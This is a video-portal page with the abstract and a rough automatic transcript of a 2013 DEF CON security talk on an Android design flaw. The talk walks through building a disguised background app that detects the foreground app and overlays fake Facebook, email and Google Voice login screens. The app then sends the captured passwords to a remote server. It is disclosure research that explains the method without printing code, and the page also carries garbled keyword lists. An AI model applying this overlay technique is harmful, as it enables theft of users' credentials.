This is REALLY not the Droid you're looking for...

Video thumbnail (Frame 0) Video thumbnail (Frame 1854) Video thumbnail (Frame 2888) Video thumbnail (Frame 4707) Video thumbnail (Frame 6961) Video thumbnail (Frame 8389) Video thumbnail (Frame 10299) Video thumbnail (Frame 12700) Video thumbnail (Frame 13365) Video thumbnail (Frame 14930) Video thumbnail (Frame 16380) Video thumbnail (Frame 19808) Video thumbnail (Frame 20753) Video thumbnail (Frame 21635) Video thumbnail (Frame 22418) Video thumbnail (Frame 23080) Video thumbnail (Frame 23864) Video thumbnail (Frame 24572) Video thumbnail (Frame 25966) Video thumbnail (Frame 27756) Video thumbnail (Frame 29096) Video thumbnail (Frame 31305) Video thumbnail (Frame 33325) Video thumbnail (Frame 34340) Video thumbnail (Frame 38756) Video thumbnail (Frame 39628) Video thumbnail (Frame 40494) Video thumbnail (Frame 42268) Video thumbnail (Frame 44211) Video thumbnail (Frame 46310)
Video in TIB AV-Portal: This is REALLY not the Droid you're looking for...

Formal Metadata

Title
This is REALLY not the Droid you're looking for...
Title of Series
Author
License
CC Attribution 3.0 Unported:
You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor.
Identifiers
Publisher
Release Date
2013
Language
English

Content Metadata

Subject Area
Abstract
Last year, we presented a talk on the implication of malware and rootkits on mobile devices. We focused on the kernel layer of the Android OS stack. With the proliferation of Apps of every size, shape and color being published this year, we focused solely upon the User Interface (UI) of the Android OS. The results of our research yielded a very dangerous flaw that is likely going to require a UI overhaul of the Android OS. Our talk will demonstrate a technique using legitimate and documented APIs to steal credentials and other user information from the most popular Apps in the Android Market. We will demo this technique live and provide a technical walkthrough of the specific methods being used. At the conclusion of our talk, we'll release a Proof of Concept (PoC) built to demo this technique. Nicholas J. Percoco Senior Vice President and Head of SpiderLabs at Trustwave With more than 14 years of information security experience, Percoco is the lead security advisor to many of Trustwaveps premier clients and assists them in making strategic decisions around security compliance regimes. He leads the SpiderLabs team that has performed more than 1000 computer incident response and forensic investigations globally, run thousands of penetration and application security tests for clients, and conducted security research to improve Trustwave's products. Percoco and his research has been featured by many news organizations including: The Washington Post, eWeek, PC World, CNET, Wired, Hakin9, Network World, Dark Reading, Fox News, USA Today, Forbes, Computerworld, CSO Magazine, CNN, The Times of London, NPR and The Wall Street Journal. Twitter: c7five Sean Schulte Software Engineer, Trustwave Sean is an engineer at Trustwave who works primarily with Java and Ruby. He is responsible for building external APIs such as the SSL reseller API, and internal APIs including a Google Safe Browsing blacklist along with the infrastructure to support various SSL services. In his spare time he maintains an unpopular, but feisty, baseball blog. Twitter: sirsean
Mobile Web Building Presentation of a group User interface Demo (music) Mobile Web Demo (music) Android (robot) Staff (military) Bit Wave Computing platform Energy level User interface Quicksort Hydraulic jump
Context awareness Software developer Multiplication sign Mobile Web Mereology Kernel (computing) Googol Rootkit Authorization Energy level Software testing Information Process (computing) Information security Software development kit Mobile Web Information Software developer Java applet Android (robot) Bit Mereology Disk read-and-write head Explosion Process (computing) Kernel (computing) Rootkit User interface Energy level Quicksort Information security Arithmetic progression
Point (geometry) Slide rule Android (robot) Statistics Mobile app Graphics tablet Closed set Code Multiplication sign Source code Flash memory Open set Revision control Different (Kate Ryan album) Googol Kernel (computing) Charge carrier Software Computer worm Information security Task (computing) Source code Flash memory Software developer Android (robot) Java applet Binary file Googol Frequency Software Charge carrier Computing platform Website Right angle Physical system
Android (robot) Mobile app Building Service (economics) Link (knot theory) Multiplication sign View (database) Execution unit Client (computing) Web browser Web service Googol Fiber bundle Software Information Data conversion Endliche Modelltheorie Vulnerability (computing) Physical system Task (computing) Mobile Web Mobile app Computer icon Pairwise comparison Execution unit Focus (optics) Email Touchscreen Information Block (periodic table) Software developer Android (robot) Data storage device Bit Term (mathematics) Tablet computer Type theory Vector space Software Web service Computing platform output Quicksort
Mobile app Touchscreen User interface Consistency Multiplication sign Mobile Web Focus (optics) System call Twitter
Mobile app Mobile app Functional (mathematics) User interface Consistency Multiplication sign Software developer Mobile Web Shared memory Electronic mailing list Twitter Number Medical imaging Message passing Googol Kernel (computing) Function (mathematics) Googol Data conversion Information security Task (computing)
Android (robot) Touchscreen Presentation of a group Mobile app Building User interface Mobile Web Device driver Twitter Web 2.0 Facebook Goodness of fit Bus (computing) output Information security Touchscreen Inheritance (object-oriented programming) Demo (music) Block (periodic table) Building Planning Sound effect Cartesian coordinate system Message passing Function (mathematics) output Quicksort Electronic visual display Information security
Revision control Mobile app Mobile app Process (computing) Demo (music) Virtuelles privates Netzwerk Server (computing) Demo (music) Computer network
Mobile app Server (computing) Online help Password Summierbarkeit
Facebook Right angle Login Summierbarkeit Area
Emulator Facebook View (database) Password Real number Sheaf (mathematics) Password
Email Type theory Execution unit Mobile app Email Password MIDI Password Client (computing) Login Summierbarkeit
Email Sign (mathematics) Mobile app Googol View (database) Online help Googol Password Password Login
Point (geometry) Email Context awareness Service (economics) Multiplication sign Android (robot) Password Group action Event horizon Web service Web service Booting Physical system Physical system Booting
Context awareness Mobile app Android (robot) Execution unit Group action Mobile app Touchscreen Mapping Information Telebanking Cartesian coordinate system Field (computer science) 2 (number) Type theory Facebook Medical imaging Web service Loop (music) Personal digital assistant Web service output Task (computing) Task (computing) Physical system
Android (robot) Default (computer science) Mobile app Building Touchscreen Demo (music) Suite (music) View (database) Real number Multiplication sign Login Stack (abstract data type) Graph coloring Fraction (mathematics) Sign (mathematics) Facebook Medical imaging Latent heat Googol Software testing Website Task (computing)
Laptop Keyboard shortcut Polygon mesh Mobile app Server (computing) System call Thread (computing) Service (economics) State of matter Demo (music) Event horizon Element (mathematics) Web service Telecommunication Internetworking Gamma function Information security Booting Engineering physics Modal logic Mobile app Touchscreen Demo (music) Server (computing) Keyboard shortcut State of matter Android (robot) Interior (topology) Computer network Login Line (geometry) Group action Thread (computing) Connected space Type theory Googol Internetworking Software Oval Password Normed vector space Order (biology) Website Identity management Spacetime Vacuum
Revision control
Revision control Duality (mathematics) Mobile app View (database) Googol Multiplication sign Computer file Right angle Bookmark (World Wide Web) Routing Spacetime Window
Authentication Touchscreen Mobile app Functional (mathematics) Server (computing) Inheritance (object-oriented programming) Login Cartesian coordinate system Login Bookmark (World Wide Web) Perspective (visual) 2 (number) Facebook Message passing Web service Password Information security
Mobile app Touchscreen Mobile app Functional (mathematics) Software developer Decision theory Multiplication sign Software developer View (database) Android (robot) Bit Spyware Cartesian coordinate system Automatic differentiation 2 (number) Revision control Facebook Type theory Popup-Fenster Different (Kate Ryan album) Googol Single-precision floating-point format output Computing platform
so talk that you're in is this is really not the droids you're looking for and I want to thank everybody for coming here and under during the dinner hour I'm Nick and this is my co-presenter Sean and we're gonna we're going to walk you through some fun journey today I'm actually personally really excited about this talk I know Sean is as well and so I'm gonna jump in brief agenda there's
to tell you what what we're going to take you what journey we're gonna take you on the staff this evening I'm going through some introductions talk about a little bit of primer history I you know I personally feel it's really important and it's very often presentations jump into deep technical concepts from the get-go we're going to sort of build everybody up to the same level and we dive into some of the technical pieces and then we're going to talk about some research motivations before that we'll talk about some mobile user interface do's and don'ts some implications will do a demo we have a live demo where I talk then Shaun's going to jump into a deep dive on how how our demo works when do a little different in this talk we're actually to show you the demo first before we do the deep dive a little and you'll see why and then we'll do a second demo and which will be which will be a lot of fun as well and will conclude so some introductions i'm nick
/ coco i am the head of the spiderlabs team at trustwave i started my info SEC career in the 90s you know mid late 90s and i was really just started out as a pen tester this is my fifth Def Con talk my except one more this weekend with Paul care who's sitting in the ions over there tomorrow i'm doing a mobile ssl talk called getting slizzard i'm also the primary author of trust which global security port and so here's your Sean I'm uh I'm just a back-end developer for the SL team so it's the first time I've done anything like this that not as quite not quite as experienced I hope you enjoy it anyway so what did this talk all about so this
is part 2 from a talk that I was part of last year did anybody see that talk last year okay so I handful of folks so that really focused on it was a kernel level rootkit so the whole idea was what are the implications of a rootkit getting on a mobile device and we explored that and really raised awareness about the risk and implications of rootkits on mobile devices what they're capable of but we didn't really touch on anything in userland at all this year and so you know I after the talk last year I was thinking and I really would like to do another Android talk and and what are some things we can do and we will talk a bit about how we actually came to the to start doing this research but but basically this year we focus 100% userland we just wanted to focus on the user interface hundred percent the whole ideas of what tricks we can play using available ap is nothing nothing nothing out of the ordinary all the aps that are available in the android sdk and then really what did Google allow developers to do what are some sort of you know what bad things can we do with it with the api's and in the process we discovered it basically a layer 70 day in the process and we're going to talk about what that is so just to jump in a
primer we're not gonna spend a lot of time here I'm sure everybody knows what with the android OS is how many people here have android devices okay that's gonna be fun so basically everybody knowed you know it's the most majority of you raise your hands where I could spend a lot of time here but it's a software stack you know it's developed for mobile devices and really it the Colonel's Linux and it's basically all we need to talk about here and then and how is it evolved well they uh they release probably a new a new OS version more a little more than once a year and a few years ago is when it really started to get good with 2.1 the donut Eclair and they they introduced the slide from right animation that lets them that lets them make it seem like you're in the same task even if you're opening different apps and that's pretty cool and then froyo came out that one that one got pretty popular was fast and had flash which everybody nose is great and since then it's been a little tougher than you updates they got gingerbread and not so many phones have those and honeycomb is just tablet only in and close source so maybe that maybe the hella maybe they'll open that one up yeah it's so um and one thing to note here just to keep in mind that we talking on their site so the percentages we have there is something that Shawn you pulled from stats from it's from google the google stats and it's a couple weeks out of date so it might be percentage points off now but yeah so that's that's the user population so just something to keep in mind as well we're talking about updates so google
actually develops android closed inside google they don't they don't let you look at the code as a development they don't let you support submit patches and and then when they release the new version then they publish a source sometimes and if there's usually if they when they do do open that there's a delay anyway and they give you the they give you the stock android only on a few devices and usually there's a you know HTC sense or other OEM customizations that that take a while for them to update and that's why people aren't getting up on gingerbread because it's been taking them a while to to update that stuff for the newer versions and they they're trying to fix that and work with the carriers to get them to update but the carriers say they have really no incentive to try that so we'll see we'll see if the updates get better and they need to because people come up with security updates that need to get pushed out right
so um you know what is the android market so i'll just take a little bit of this and basically it's a place where you buy apps everybody here in this room you know it was android phone or android mobile device you know tablet or whatever they have that's that's where you get your apps from yeah and unlike it unlike some other app stores that check your apps and have to approve them to get in which can take some time the android market does not approve any apps and when you submit it they're available immediately and they don't check that you're not doing anything malicious before they send it out they can if they discover that you are they can take it out of the market and they can remotely delete it from phones but it's a it's a less proactive approach to protecting the users one thing that gets to think about the comparisons who Android versus versus the iOS from Apple devices I was recently asked you know you know if you were going to have to attack either those devices what method would you use and it's just sort of interview conversation I basically said if I was one of the attack Android users I would use the I would use the marketplace i use the android market i'm at want to attack iOS users I'd use a jailbreak vulnerability to go after that user base so that's it that's a very different different model there as well from up from an attack vector standpoint so when
you're developing for Android there are a few there just a few basic building blocks that you really want to use to put your stuff together the most basic unit of Android app is the activity that's just a screen that sits in front of the user all all the UI that you build is in an activity and you can bundle up some data in an intent and publish that intent that other apps can register that they care about that intent or that type of intent and so for example if you open up your email client and you cook you click a link that link is put into intent and intent by the email client that the androids and the android system sees oh well I know the app that uses that link that you're so you opened directly in the browser instead of requiring the email client their own WebKit view or something so that's how that's how they that's how they implement their their their goal of having task-based you I with using different apps and then if you want to run anything in the background you have these services so the app themself once you once you hit the home button or something and you leave your app it's not continuing to run unless it registers as a service which doesn't have any UI in it obviously but can can perform tasks and network network i/o and play and play sounds I think but when you want to get the users attention from the background your your service can get can receive some information of the network and pop up a notification that shows up in the top bar and it's pretty those are pretty easy to deal with and that's that's really the primary way that the developers should be giving it users users attention when they're not in focus so when you're
making an app you want to you want to be simple consistent and and get the users attention because you want them to use your app they open up your app to do one
thing at a time and really one thing only so the each screen should be focused on one purpose and just do one thing and it should be obvious what you're doing you know sometimes you're going to be reading a tweet or making a phone call or looking at sports scores they also be consistent you know you
don't you don't want to have to reimplement if one else's functionality in your own app because then it wouldn't work the same and it wouldn't look the same so you you use other apps to perform the stuff that that people are going to be doing in yours and they'll get back to you with the back button and if you send them away and then they'll going to remember that and come back so you can see on those images there that's a that's a you know a little task I took a picture and wanted to tweet it and so that's how you do just use select you select the share and it lists off everything all the apps that can receive a picture and act on it and you choose you know Twitter and then you can go to eat the image in the consistent these pieces is also extremely important from a security standpoint because your users who you want them to expect certain activity or you know that are going on in there in their app occasions and so they're disappearing security implications of that and what we're going to show you some of those those images by the way is that was me tweeting an image of my iPad getting a kernel panic so that's fun google tells
all developers not to over I the baby or the back button they want the back button to behave consistently across everything so when you send an intent or someone intense an intent to you and they expect the user expects to hit the back button and go back to the place they came from for this for this task based model but in some of Google's own apps they don't really do that very well this this example here is the google voice text messaging app i received a text message from a friend of mine responded to it and left the app and then got another one and another one we having a text conversation and then later i wanted to go back and text someone else so i opened up the google voice app and he brought me back into this conversation now that's about what i would have expected but then hit the back button to go back to the list of conversations and select a new one except it brought me back to the same conversation i was already in and i had to hit the back button the same number of times as the number of times i received a text message in that conversation and they probably should fix that so what's important in getting
a user's attention is to use a notification and don't just jump in front of them you know that's that's not really what you want to do that's not what the user wants to see and you just really shouldn't do that but of course that's just a best practice and you don't have to follow those practices on Android so when we think about sort of
research motivation so you know why did we do this research this was initially a side effect of some other research that Paul Paul Kerr and I were doing for the for the getting slizzard talk we noticed a clerk in one of the apps we were starting to work with and then we started talking to talking to Sean about it but basically what you'll see what we mean when we could get further into this presentation but basically a lot of research focuses on breaking things so you want to find some malicious input that's going to cause some bad result and so the inputs malicious the outputs bad in it and that's a lot of a lot of what happens in industry but we wanted to raise the question it sort of you know go down the path of saying what can we do by using good building blocks you know good things good tools approved invalid api's and could the output be bad and so that was really you know a big big driver in the motivation and then the other piece is that mobile often sacrifices security for screen size so we're going to show you when we show you the demo you know when you're sitting at your desk and you're sitting and you have a 27-inch screen in front of you and something goes awry from a security standpoint or some application you know house having a problem you can see that and you can recognize it because you're sitting idle you're just sitting there you might be eating some Cheetos and surfing the web but the but when you have a mobile device you could be walking down the hall you can be jumping on a bus jumping in a cab boarding a plane and you glance at your device sometimes very quickly and respond to two messages could be you know Twitter messages you could be on Facebook you could be every play any place and and when there's when there's things that go awry it may not be a parent and sometimes it might not be apparent to security people it's definitely going to be a parent to your grandma so so that's one another piece of the research motivation and then we also want to see you know how far can we push the end user now how far can we push them using valid api's to do bad things and then you know some of the
research implications and so we're gonna talk about one of them here and there's we'll have some more at the end but basically consider the following scenario an attacker builds an app using approved api's now these are these are things that if even if Google was doing some filtering with within their apps mission process they wouldn't be able to tect they smith the app to a public app market the app is approved in the Google market example it's improved immediately and available for download the user downloads the app the apps able to steal credentials from popular apps the users expect nothing in there but with their device and so that's exactly what we're going to show you so sean is going to do
a demo in a few minutes what we're going to do is we to play with an app called bantha poodoo I think the original version of the app was a magic 8-ball and since this is sound somewhat of a star wars-themed talk I told them that we need to call us something you know something like bantha or bantha poodoo and of course you'll see what you'll you'll see what we put it within this app too because it's maybe slightly offensive but but you'll see so when I play with some popular apps and you can see since credentials being stolen while we're actually playing with those apps and logging into those apps so right here right now right
over here i have my server over in Russia where I'm trying to steal everyone's passwords and here this is just some user who went to the market and you downloaded this this cool app
that you know everyone is talking about and so you get a kick out of it that's that's a lot of fun then no you're you're bored but you're bored you have
to get out of there so all right i'm gonna go i'm gonna go log into facebook
now and all right so tasty was telling
me I have to login that's fine usually when when facebook tells me to log in i'll just do that so I'll quick
hit the login button facebook seems to
be acting weird so I'm just going to leave and over here in Russia you see
device ID on the emulator is always zero so if there's a section on an actual phone we get the real device ID that's unique across all the devices and then I know that somebody logged into Facebook and here's a user name and here's the password i typed in I guess you're gonna have to trust me that that's the one i typed in because they kind of block that
and it's it's really any app that that has a login screen you if they can make
it you can make it too so jump over here on the email the email client wants me
to login and it's also acting weird if you if you wanted to make this a real attack you'd probably not have it attack so aggressively and as soon as they type in their password you ask them again you could you know go away but here's here's the 12 just hiked in there and then jump
over a google voice same thing if you want to get someone's google password
this looks exactly like the google voice login screen
and there is that so any app that any
app that wants to let you log in has to ask for your username and password and if they can do it then someone else can do it and the problem is that once used once the user installed bantha poodoo or any other app that's trying to be malicious it can run in the background and it can know what app is running in the foreground and it doesn't have to use a notification to get your attention it can just jump out in front yeah so what we're gonna actually going to do is we're gonna do a deep dive yeah I'm going to I'm going to run through what
you have to do to actually do that it's
it's painfully not complicated actually so the first thing is that you need to register the service you're going to run in the background and you're going to do the point is to monitor what's happening on the phone so you register your service and you call it or got android got important system service so if the user goes and looks at their running services they're going to think that's important and it's from android so i'm not going to quit it and you see here it's using it it's using an intent filter that will let it respond to respond to and send some intense here I've set up a receiver that receives the boot completed event so every time the phone starts up I received this and I start the important system service and that way I showed I showed you that I opened up anthaku didn't played with it but you don't have to open it if I if you install it and then go away and your phone restarts or whatever you and your bent was just sitting in the background it's not you don't have to actually use it but it starts up its running and you don't you don't ever I need to know you don't even ever need to know that I'm attacking you so then you decide which
apps you want to which after you want to attack and you just have to look at them and figure out how they built their screen take screenshots you cut their images out you can in the case of Facebook I decompile their apk and took their assets sorry and then just set up a map of the package name to the clap the activity affecting name of the app to the tivity that you're using to attack it well yeah I mean this could be any application so I mean we just chose these four for this for this group of concept but this could be an online banking application this could be a VPN credentials it could be could be with others any type of application you want and it doesn't necessarily just have to be credentials it could be it could be a data input field in a specific app that you know is always there always there on startup and you could ask the user to enter their information that you want to gather from them so then in your service
you you set up a timer that's going to run you know every so often this one is running every two seconds it doesn't have to be that aggressive but it's a it's a it's not an expensive task to do to check this out so you asked the US the system service to get the actual Android system service to give you the activity service and that's going to let you monitor what activities are currently being run and so you loop over all the running activities and here importantly you find the you find the one that has importance for ground that means it's running in front and that's what the user is currently looking at so as soon as you find that one I built a new intent and I put the I teldat I tell the intent that is going to be an activity new task so it knows it's going to pop up a new up on the screen in a different application in a in a new task so it's not going to be in the same the same stack as their as their actual task what that what that'll do for me is that if they if they hit home and leave and then go back to the app through the app switcher if I didn't do the new task here it would they would come back in and come back to my app and that would be that would be the one in the foreground but if I do the new task they'll do that and they'll go back to their app where they were before where I can attack them again but I won't be the one in front and then I just start that activity I mean one thing we didn't show
in the demo which would mostly be apparent in many users you typically don't log in to your say facebook app for the first time so in the real world scenario the person would actually launch facebook see their timeline on screen for a fraction of it for a fraction of a second and the login screen would pop up what what what he's saying is that what you saw in the demo I opened up Facebook hit login and it went away and there was another login screen and then another login screen on top of it normally you're authenticated to Facebook so there wouldn't be there wouldn't be a stack of logins screen waiting for you anyhow so you have to when you're attacking when you're building these these views some of them leave the tetteh bar on at the top some of them get rid of it some of them customize the color some of them just use their own image so you just have to mimic that and you just ask androids it the same way the same way they do when they legitimately make their app you say I want to use a custom title bar or I I don't want there to be a title olive bar at all and if you're using a custom one you just you pick which custom one that you built you use this one and its activity suspicious activity specific so each one of my logon each one of my attacking screens looks looks like it wants to just just like any just like any other activity can and this one is
crucial you override the back button so that when they come to your login screen and they head back not only do we want to go back to the apt they were in before which it would be the default behavior of the back button we want to get rid of this task so this move task to back is is kind of is it's kind of like a quit it throw it throws the test you were in the new task we created with our intent to the back of the activity stack that it changes behavior pretty pretty starkly and it it's something that Google may actually want to do in their google voice app so once we have
the credentials they we get them we get them to type using password in we ship that off in another intent to our services running in the background and when it receives that intent it fires up a new thread where it just uploads it to a server that's that's what Google wants you to do they don't want you doing network I owe on the UI thread so you just spin it off on a background thread in the in the service so it doesn't it doesn't delay the user and if your network is slow you're just going to continue and you're not going to not going to worry that you have to wait to send me your password and here in order to in order to do this stuff Google does require you to have security permissions and the thing is you just ask for them and people go to the market and they see this app needs to use the internet and and view the phone's state I mean most apps need to do those things and the boot completed event doesn't even show up in the market like I want to know that you started your phone and google doesn't think you really need to know that so that I have a picture here of what you see on the market website when you when you try to download my when you try to download an app with these exact permissions it doesn't it looks it looks a little innocuous and in some ways they want it to be because eps need to use this stuff they don't want to scare everyone away from downloading any app for any reason and here in the i just have a couple of a couple more a couple more tidbits for you that sometimes you want to make sure that some some of the apps resize the elements on the screen when the keyboard pops up and some don't sometimes the keyboard slides up in front of things if they can do it you can do it too and no history is it kind of a cool one that way when they leave your apt like they come to your app and then they leave it normally if you hold down the home button it'll show you all the apps that you've recently run but if we start it up and we ran in the background we're attacking you and then they they're switching apps with the with the app switcher and they see bantha poodoo in there and they're like haven't played bantha poodoo for two weeks we don't want them to see that so we do we tell it no history and does it doesn't show up in the app switcher when it's not when it's not running so it's kind of cool you can do that too so we have a second demo here and so what we want to do is we're going to modify bantha poodoo remove its cadential upload capabilities because we don't actually want to passwords and we're going to submit it to the android market no I guess we hope we have internet connectivity here from this from this laptop here but and also hopefully they're not watching mm-hmm and then you can um you can download it and try it yourself so you could play with it on your phone but we will guarantee you will be annoyed yeah you shouldn't uninstall it pretty quickly especially if you use any of those apps that we're jumping in front of so here forgot my ad
credentials receiver don't have a lot of screen space though so you can see I am uploading here and I'll just comment that line out so it doesn't actually upload now I'm going to build a package and explore them
they're like I said the original version was magic 8-ball I think that's why it's still called that yeah so want to call it bantha poodoo yes I that's right i mean if they can make it you can make it there's no there's nothing special about it I mean well yeah so
this is long just packaged today 927 p.m. central time so if all goes well everybody this audience can actually go and download this app Oh somebody took my my name I tried I tried that one out a little while ago and was oh it was free so I guess that one is in there as of AZ recently so it'll take me a little while to rejigger the package name I have to change a bunch of things around in the code and need a little more space in this but will will release its the market later on we wanted to let you download it right now but it'll be this weekender or next week yeah and there's actually is a version of it an earlier version of it on the DEF CON DVD yeah so you can you can play route the right now if you wanted to load it on manual so let's go back in to the presentation and
basically some other thoughts on how to weaponize obviously the functionality in the in the app that worried that we released it's it's it's not the greatest from from an attackers perspective now there's some quirks or some things that would be annoying to end users but basically you know one of the concepts is being able to phone home to a server and have that server successfully check for the authentication to make sure that authentication is valid and then send a message back to the app to say stop popping in front of the facebook applications we already know their username password and then you know couple other things is you know showing the login screen after they've been an app for a while and we set ours what does it set it the reserve is every two seconds I mean it it doesn't need to be that aggressive and and even if it even if it is if it checks every two seconds it doesn't have to put it in front you every two seconds it can wait you know ten minutes while you're using the app and if it's open that long maybe the app wants you don't authenticate again I mean that could be a legitimate thing it happens actually pretty often in bank applications that they were security reasons want to make you reallocate so nobody just picked up your phone and uses it so that that exact that exact security feature can can be dangerous so I give you good people used to that so then then we also were thinking about
this and there are some other uses to this design flaw it's not just stealing credentials so unfortunately this may be coming to your phone very soon app targeted pop-up ads so basically what that means is that if you're in one app and you download an app that has this features and functionality in it they can decide that hey you're in facebook I'm going to throw ads in front of you while you're in logger in your phone and you're using those applications the other idea is is hijacking competitors apps so someone wants to make a new social network or a new a new app and they they want they don't want Facebook to work quite as well for you for example so every time you open up facebook you know some crap pops in front of you and then goes away up to 3 seconds but or doesn't and it just gets really annoying because you can you should just screw with other people's apps and there's nothing they can really do to stop you from doing it another thing you can do is say say you're angry birds competitor you can you can embed a really crappy version of angry birds into your app and every single time someone goes to play Angry Birds on your version pops up in front of them and they decide to uninstall angry birds and then there's other ways that you probably can think of that you can be a jerk so some conclusions here that we
can we can talk through it really approved api's can be used to create malicious apps and that's basically what we did here this is this is specifically a design flaw where these these AP is are not restricted and in this in this type of use and Google really has to has to change that because not restricting developers from from doing whatever they want to is a disaster waiting to happen that iOS doesn't suffer from this because you can't monitor who is what app is running and you can't put something in front of the user without their direct intervention and they have different in different animations switching between different apps versus switching between views in the same app they those are those are the three key differences that allows and it's not it's not just this that's the problem it's it's it's the fact that the developers can do whatever they want on the platform yeah so that that's that's our talk I guess we have a little bit time there's anybody have any questions you
Feedback